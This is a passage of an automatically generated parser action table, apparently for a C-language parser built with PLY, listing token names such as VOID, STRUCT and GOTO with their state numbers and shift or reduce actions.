{'INT_CONST_CHAR':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,132,-335,-28,-182,-27,132,-337,-87,-72,-337,132,-286,-285,132,132,-283,-287,-288,132,-284,132,132,132,-336,-183,132,132,-28,-337,132,-28,-337,-337,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,132,-337,-76,-79,-82,-75,132,-77,132,132,-81,-215,-214,-80,-216,132,-78,132,132,-69,-284,132,132,-284,132,132,-244,-247,-245,-241,-242,-246,-248,132,-250,-251,-243,-249,-12,132,132,-11,132,132,132,132,-234,-233,132,-231,132,132,-217,132,-230,132,-84,-218,132,132,132,-337,-337,-198,132,132,132,-337,-284,-229,-232,132,-221,132,-83,-219,-68,132,-28,-337,132,-11,132,132,-220,132,132,132,-284,132,132,132,-337,132,-225,-224,-222,-84,132,132,132,-226,-223,132,-228,-227,]),'VOID':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[6,-337,-113,-128,6,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,6,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,6,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,6,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,6,-131,-95,-101,-97,6,-53,-126,6,-88,6,6,-93,6,-147,-335,-146,6,-167,-166,-182,-100,-126,6,-87,-90,-94,-92,-61,-72,6,-144,-142,6,6,6,-73,6,-89,6,6,6,-149,-159,-160,-156,-336,6,-183,-30,6,6,-74,6,6,6,6,-174,-175,6,-143,-140,6,-141,-145,-76,-79,-82,-75,-77,6,-81,-215,-214,-80,-216,-78,-127,6,-153,6,-151,-148,-157,-168,-69,-36,-35,6,6,6,-234,-233,6,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,6,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'LBRACKET':([2,3,5,6,7,10,11,12,13,18,20,22,23,26,27,30,33,34,35,36,39,42,43,44,46,48,49,50,54,56,58,60,62,68,71,73,76,77,80,81,82,86,96,97,98,100,101,103,104,105,106,109,111,127,132,133,134,136,138,139,140,141,142,143,145,147,148,152,153,154,156,160,161,163,164,166,167,168,169,176,177,187,191,198,199,200,211,216,227,230,235,236,237,238,240,241,261,263,269,275,276,278,279,280,283,310,312,314,316,317,328,340,341,342,344,345,347,355,356,371,376,402,403,404,405,407,411,414,442,443,448,449,453,454,457,458,464,465,470,472,474,482,483,488,489,490,492,511,512,518,519,520,526,527,529,530,531,532,544,545,547,550,551,559,560,563,565,570,571,572,],[-113,-128,-124,-110,-106,-104,-107,-125,-105,-99,-109,-120,-115,-102,-126,-108,-238,-111,-337,-122,-129,-29,-121,-116,-112,117,-123,-117,-119,-114,-130,-118,-103,-96,-98,128,-131,-37,-95,-101,-97,117,-147,-335,-146,-167,-166,-28,-180,-182,-27,-100,-126,128,-317,-321,-318,-303,-324,-330,-313,-319,-144,-301,-314,-142,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,265,-323,-312,282,-149,-336,-183,-181,-30,282,-38,373,-326,-334,-332,-331,-333,-174,-175,-298,-297,-143,-140,282,282,-141,-145,421,-312,-127,-153,-151,-148,-168,-36,-35,282,282,459,-45,-44,-43,-199,373,-296,-295,-294,-293,-292,-305,421,-152,-150,-170,-169,-31,-34,282,459,-39,-42,-202,373,-200,-290,-291,373,-213,-207,-211,-33,-32,-41,-40,-201,549,-307,-209,-208,-210,-212,-51,-50,-306,373,-299,-46,-49,-308,-300,-48,-47,-309,]),'WCHAR_CONST':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,133,-335,-28,-182,-27,133,-337,-87,-72,-337,133,-286,-285,133,133,-283,-287,-288,133,-284,133,133,133,-336,-183,133,133,-28,-337,133,-28,-337,-337,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,-337,-76,-79,-82,-75,133,-77,133,133,-81,-215,-214,-80,-216,133,-78,133,133,-69,-284,133,133,-284,133,133,-244,-247,-245,-241,-242,-246,-248,133,-250,-251,-243,-249,-12,133,133,-11,133,133,133,133,-234,-233,133,-231,133,133,-217,133,-230,133,-84,-218,133,133,133,-337,-337,-198,133,133,133,-337,-284,-229,-232,133,-221,133,-83,-219,-68,133,-28,-337,133,-11,133,133,-220,133,133,133,-284,133,133,133,-337,133,-225,-224,-222,-84,133,133,133,-226,-223,133,-228,-227,]),'FLOAT_CONST':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,134,-335,-28,-182,-27,134,-337,-87,-72,-337,134,-286,-285,134,134,-283,-287,-288,134,-284,134,134,134,-336,-183,134,134,-28,-337,134,-28,-337,-337,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,-337,-76,-79,-82,-75,134,-77,134,134,-81,-215,-214,-80,-216,134,-78,134,134,-69,-284,134,134,-284,134,134,-244,-247,-245,-241,-242,-246,-248,134,-250,-251,-243,-249,-12,134,134,-11,134,134,134,134,-234,-233,134,-231,134,134,-217,134,-230,134,-84,-218,134,134,134,-337,-337,-198,134,134,134,-337,-284,-229,-232,134,-221,134,-83,-219,-68,134,-28,-337,134,-11,134,134,-220,134,134,134,-284,134,134,134,-337,134,-225,-224,-222,-84,134,134,134,-226,-223,134,-228,-227,]),'MINUS':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,132,133,134,135,136,137,138,139,140,141,143,144,145,146,148,149,150,151,152,153,154,156,158,160,161,162,163,164,165,166,167,168,169,171,173,174,175,176,181,191,198,201,204,205,206,218,219,220,224,227,229,230,231,232,233,234,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,263,265,266,268,273,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,310,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,478,480,481,482,483,484,487,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,547,549,550,551,553,554,555,557,558,565,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,135,-335,-28,-182,-27,135,-337,-87,-72,-337,135,-317,-321,-318,-286,-303,-285,-324,-330,-313,-319,-301,-274,-314,135,-327,135,-283,-287,-325,-304,-322,-302,-255,-315,-289,245,-328,-316,-288,-329,-320,-276,-323,135,-284,135,135,-312,135,-336,-183,135,135,-28,-337,135,-28,-337,-274,-337,135,-326,135,-280,135,-277,-334,-332,-331,-333,135,135,135,135,135,135,135,135,135,135,135,135,135,135,135,135,135,135,135,-298,-297,135,135,-279,-278,-337,-76,-79,-82,-75,135,-77,135,135,-81,-215,-214,-80,-216,135,-78,-312,135,135,-69,-284,135,135,-284,135,135,-244,-247,-245,-241,-242,-246,-248,135,-250,-251,-243,-249,-12,135,135,-11,245,245,245,-260,245,245,245,-259,245,245,-257,-256,245,245,245,245,245,-258,-296,-295,-294,-293,-292,-305,135,135,135,135,-234,-233,135,-231,135,135,-217,135,-230,135,-84,-218,135,135,135,-337,-337,-198,135,-281,-282,135,-290,-291,135,-275,-337,-284,-229,-232,135,-221,135,-83,-219,-68,135,-28,-337,135,-11,135,135,-220,135,135,135,-284,135,135,-306,135,-337,-299,135,-225,-224,-222,-84,-300,135,135,135,-226,-223,135,-228,-227,]),'RPAREN':([2,3,5,6,7,10,11,12,13,18,20,22,23,26,27,30,33,34,35,36,39,42,43,44,46,48,49,50,54,56,58,60,62,68,71,73,76,77,80,81,82,86,96,98,100,101,103,104,105,106,107,109,111,118,125,127,129,132,133,134,136,138,139,140,141,142,143,144,145,147,148,152,153,154,156,157,158,159,160,161,162,163,164,166,167,168,169,176,177,178,183,187,191,198,199,200,203,207,208,209,210,211,212,213,215,216,221,222,224,225,230,232,234,235,236,237,238,240,241,261,263,266,268,269,270,271,272,273,274,275,276,277,278,279,280,281,283,294,312,314,316,317,328,340,341,342,343,344,345,346,347,348,355,356,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,408,409,411,414,415,416,417,418,422,433,439,442,443,448,449,452,453,454,457,458,460,461,462,463,464,465,468,476,478,480,482,483,486,487,489,490,492,495,501,503,507,511,512,516,517,518,519,524,525,526,527,529,530,531,532,544,545,547,551,553,556,559,560,563,565,566,567,570,571,572,573,],[-113,-128,-124,-110,-106,-104,-107,-125,-105,-99,-109,-120,-115,-102,-126,-108,-238,-111,-337,-122,-129,-29,-121,-116,-112,-52,-123,-117,-119,-114,-130,-118,-103,-96,-98,-54,-131,-37,-95,-101,-97,-53,-147,-146,-167,-166,-28,-180,-182,-27,200,-100,-126,-337,216,-55,-337,-317,-321,-318,-303,-324,-330,-313,-319,-144,-301,-274,-314,-142,-327,-325,-304,-322,-302,240,-255,241,-315,-289,-253,-328,-316,-329,-320,-276,-323,-312,-337,-252,312,-149,-336,-183,-181,-30,332,340,-17,341,-186,-337,-18,-184,-191,-38,355,356,-274,-239,-326,-280,-277,-334,-332,-331,-333,-174,-175,-298,-297,407,-279,-143,411,413,-235,-278,-203,-140,-204,-1,-337,-141,-145,-2,-206,-14,-127,-153,-151,-148,-168,-36,-35,-337,-190,-204,-56,-188,-45,-189,-44,-43,476,477,478,479,480,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,-270,-258,-296,-295,-294,-293,-292,-310,483,-305,-205,-23,-24,489,490,-337,-13,-218,-152,-150,-170,-169,510,-31,-34,-204,-57,-337,-192,-185,-187,-39,-42,-240,-237,-281,-282,-290,-291,-236,-275,-213,-207,-211,532,535,537,539,-33,-32,544,545,-41,-40,-254,-311,547,-307,-209,-208,-210,-212,-51,-50,-306,-299,-337,568,-46,-49,-308,-300,-337,574,-48,-47,-309,577,]),'STRUCT':([0,1,3,7,10,11,13,14,16,17,19,20,21,25,26,27,29,30,38,39,40,42,45,47,48,52,53,55,58,59,61,62,63,64,65,66,67,75,85,86,87,90,91,93,94,95,97,99,105,118,119,120,121,122,123,124,129,172,174,180,181,182,184,185,186,188,189,190,191,198,200,214,223,229,231,233,239,240,241,267,278,284,285,286,289,291,298,300,301,302,303,305,308,312,313,315,318,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,446,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[24,-337,-128,-106,-104,-107,-105,-64,-60,-67,-66,-109,24,-65,-102,-337,-131,-108,-63,-129,24,-29,-62,-70,-52,-337,-337,-337,-130,24,-71,-103,-337,-9,-131,-91,-10,24,24,-53,-337,-88,24,24,-93,24,-335,24,-182,24,-87,-90,-94,-92,-61,-72,24,24,24,-73,24,-89,24,24,24,-159,-160,-156,-336,-183,-30,24,-74,24,24,24,24,-174,-175,24,24,-76,-79,-82,-75,-77,24,-81,-215,-214,-80,-216,-78,-127,24,24,-157,-69,-36,-35,24,24,24,-234,-233,24,-231,-217,-230,-81,-84,-218,-158,-31,-34,24,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'LONG':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[23,-337,-113,-128,23,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,23,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,23,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,23,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,23,-131,-95,-101,-97,23,-53,-126,23,-88,23,23,-93,23,-147,-335,-146,23,-167,-166,-182,-100,-126,23,-87,-90,-94,-92,-61,-72,23,-144,-142,23,23,23,-73,23,-89,23,23,23,-149,-159,-160,-156,-336,23,-183,-30,23,23,-74,23,23,23,23,-174,-175,23,-143,-140,23,-141,-145,-76,-79,-82,-75,-77,23,-81,-215,-214,-80,-216,-78,-127,23,-153,23,-151,-148,-157,-168,-69,-36,-35,23,23,23,-234,-233,23,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,23,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'PLUS':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,132,133,134,135,136,137,138,139,140,141,143,144,145,146,148,149,150,151,152,153,154,156,158,160,161,162,163,164,165,166,167,168,169,171,173,174,175,176,181,191,198,201,204,205,206,218,219,220,224,227,229,230,231,232,233,234,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,263,265,266,268,273,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,310,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,478,480,481,482,483,484,487,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,547,549,550,551,553,554,555,557,558,565,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,137,-335,-28,-182,-27,137,-337,-87,-72,-337,137,-317,-321,-318,-286,-303,-285,-324,-330,-313,-319,-301,-274,-314,137,-327,137,-283,-287,-325,-304,-322,-302,-255,-315,-289,249,-328,-316,-288,-329,-320,-276,-323,137,-284,137,137,-312,137,-336,-183,137,137,-28,-337,137,-28,-337,-274,-337,137,-326,137,-280,137,-277,-334,-332,-331,-333,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,-298,-297,137,137,-279,-278,-337,-76,-79,-82,-75,137,-77,137,137,-81,-215,-214,-80,-216,137,-78,-312,137,137,-69,-284,137,137,-284,137,137,-244,-247,-245,-241,-242,-246,-248,137,-250,-251,-243,-249,-12,137,137,-11,249,249,249,-260,249,249,249,-259,249,249,-257,-256,249,249,249,249,249,-258,-296,-295,-294,-293,-292,-305,137,137,137,137,-234,-233,137,-231,137,137,-217,137,-230,137,-84,-218,137,137,137,-337,-337,-198,137,-281,-282,137,-290,-291,137,-275,-337,-284,-229,-232,137,-221,137,-83,-219,-68,137,-28,-337,137,-11,137,137,-220,137,137,137,-284,137,137,-306,137,-337,-299,137,-225,-224,-222,-84,-300,137,137,137,-226,-223,137,-228,-227,]),'ELLIPSIS':([350,],[462,]),'U32STRING_LITERAL':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,139,146,148,149,150,151,153,163,165,166,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,139,-335,-28,-182,-27,139,-337,-87,-72,-337,139,-286,-285,-330,139,-327,139,-283,-287,235,-328,-288,-329,139,-284,139,139,139,-336,-183,139,139,-28,-337,139,-28,-337,-337,139,139,139,-334,-332,-331,-333,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,-337,-76,-79,-82,-75,139,-77,139,139,-81,-215,-214,-80,-216,139,-78,139,139,-69,-284,139,139,-284,139,139,-244,-247,-245,-241,-242,-246,-248,139,-250,-251,-243,-249,-12,139,139,-11,139,139,139,139,-234,-233,139,-231,139,139,-217,139,-230,139,-84,-218,139,139,139,-337,-337,-198,139,139,139,-337,-284,-229,-232,139,-221,139,-83,-219,-68,139,-28,-337,139,-11,139,139,-220,139,139,139,-284,139,139,139,-337,139,-225,-224,-222,-84,139,139,139,-226,-223,139,-228,-227,]),'GT':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,250,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,250,-262,-260,-264,250,-263,-259,-266,250,-257,-256,-265,250,250,250,250,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'GOTO':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,287,-336,-76,-79,-82,-75,-77,287,-81,-215,-214,-80,-216,287,-78,-69,-234,-233,-231,287,-217,-230,287,-84,-218,287,-229,-232,-221,287,-83,-219,-68,287,-220,287,287,-225,-224,-222,-84,287,287,-226,-223,287,-228,-227,]),'ENUM':([0,1,3,7,10,11,13,14,16,17,19,20,21,25,26,27,29,30,38,39,40,42,45,47,48,52,53,55,58,59,61,62,63,64,65,66,67,75,85,86,87,90,91,93,94,95,97,99,105,118,119,120,121,122,123,124,129,172,174,180,181,182,184,185,186,188,189,190,191,198,200,214,223,229,231,233,239,240,241,267,278,284,285,286,289,291,298,300,301,302,303,305,308,312,313,315,318,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,446,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[32,-337,-128,-106,-104,-107,-105,-64,-60,-67,-66,-109,32,-65,-102,-337,-131,-108,-63,-129,32,-29,-62,-70,-52,-337,-337,-337,-130,32,-71,-103,-337,-9,-131,-91,-10,32,32,-53,-337,-88,32,32,-93,32,-335,32,-182,32,-87,-90,-94,-92,-61,-72,32,32,32,-73,32,-89,32,32,32,-159,-160,-156,-336,-183,-30,32,-74,32,32,32,32,-174,-175,32,32,-76,-79,-82,-75,-77,32,-81,-215,-214,-80,-216,-78,-127,32,32,-157,-69,-36,-35,32,32,32,-234,-233,32,-231,-217,-230,-81,-84,-218,-158,-31,-34,32,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'PERIOD':([97,132,133,134,136,138,139,140,141,143,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,227,230,235,236,237,238,261,263,310,371,376,402,403,404,405,407,411,470,472,474,482,483,488,520,526,527,547,550,551,563,565,572,],[-335,-317,-321,-318,-303,-324,-330,-313,-319,-301,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,264,-323,-312,-336,372,-326,-334,-332,-331,-333,-298,-297,-312,-199,372,-296,-295,-294,-293,-292,-305,-202,372,-200,-290,-291,372,-201,548,-307,-306,372,-299,-308,-300,-309,]),'GE':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,254,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,254,-262,-260,-264,254,-263,-259,-266,254,-257,-256,-265,254,254,254,254,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'INT_CONST_DEC':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,140,-335,-28,-182,-27,140,-337,-87,-72,-337,140,-286,-285,140,140,-283,-287,-288,140,-284,140,140,140,-336,-183,140,140,-28,-337,140,-28,-337,-337,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,-337,-76,-79,-82,-75,140,-77,140,140,-81,-215,-214,-80,-216,140,-78,140,140,-69,-284,140,140,-284,140,140,-244,-247,-245,-241,-242,-246,-248,140,-250,-251,-243,-249,-12,140,140,-11,140,140,140,140,-234,-233,140,-231,140,140,-217,140,-230,140,-84,-218,140,140,140,-337,-337,-198,140,140,140,-337,-284,-229,-232,140,-221,140,-83,-219,-68,140,-28,-337,140,-11,140,140,-220,140,140,140,-284,140,140,140,-337,140,-225,-224,-222,-84,140,140,140,-226,-223,140,-228,-227,]),'ARROW':([132,133,134,136,138,139,140,141,143,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,230,235,236,237,238,261,263,310,402,403,404,405,407,411,482,483,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,262,-323,-312,-336,-326,-334,-332,-331,-333,-298,-297,-312,-296,-295,-294,-293,-292,-305,-290,-291,-306,-299,-300,]),'_STATIC_ASSERT':([0,14,16,17,19,25,38,45,47,59,61,97,119,123,124,180,181,191,223,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[41,-64,-60,-67,-66,-65,-63,-62,-70,41,-71,-335,-87,-61,-72,-73,41,-336,-74,-76,-79,-82,-75,-77,41,-81,-215,-214,-80,-216,41,-78,-69,-234,-233,-231,41,-217,-230,41,-84,-218,41,-229,-232,-221,41,-83,-219,-68,41,-220,41,41,-225,-224,-222,-84,41,41,-226,-223,41,-228,-227,]),'CHAR':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[46,-337,-113,-128,46,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,46,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,46,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,46,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,46,-131,-95,-101,-97,46,-53,-126,46,-88,46,46,-93,46,-147,-335,-146,46,-167,-166,-182,-100,-126,46,-87,-90,-94,-92,-61,-72,46,-144,-142,46,46,46,-73,46,-89,46,46,46,-149,-159,-160,-156,-336,46,-183,-30,46,46,-74,46,46,46,46,-174,-175,46,-143,-140,46,-141,-145,-76,-79,-82,-75,-77,46,-81,-215,-214,-80,-216,-78,-127,46,-153,46,-151,-148,-157,-168,-69,-36,-35,46,46,46,-234,-233,46,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,46,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'HEX_FLOAT_CONST':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,141,-335,-28,-182,-27,141,-337,-87,-72,-337,141,-286,-285,141,141,-283,-287,-288,141,-284,141,141,141,-336,-183,141,141,-28,-337,141,-28,-337,-337,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,-337,-76,-79,-82,-75,141,-77,141,141,-81,-215,-214,-80,-216,141,-78,141,141,-69,-284,141,141,-284,141,141,-244,-247,-245,-241,-242,-246,-248,141,-250,-251,-243,-249,-12,141,141,-11,141,141,141,141,-234,-233,141,-231,141,141,-217,141,-230,141,-84,-218,141,141,141,-337,-337,-198,141,141,141,-337,-284,-229,-232,141,-221,141,-83,-219,-68,141,-28,-337,141,-11,141,141,-220,141,141,141,-284,141,141,141,-337,141,-225,-224,-222,-84,141,141,141,-226,-223,141,-228,-227,]),'DOUBLE':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,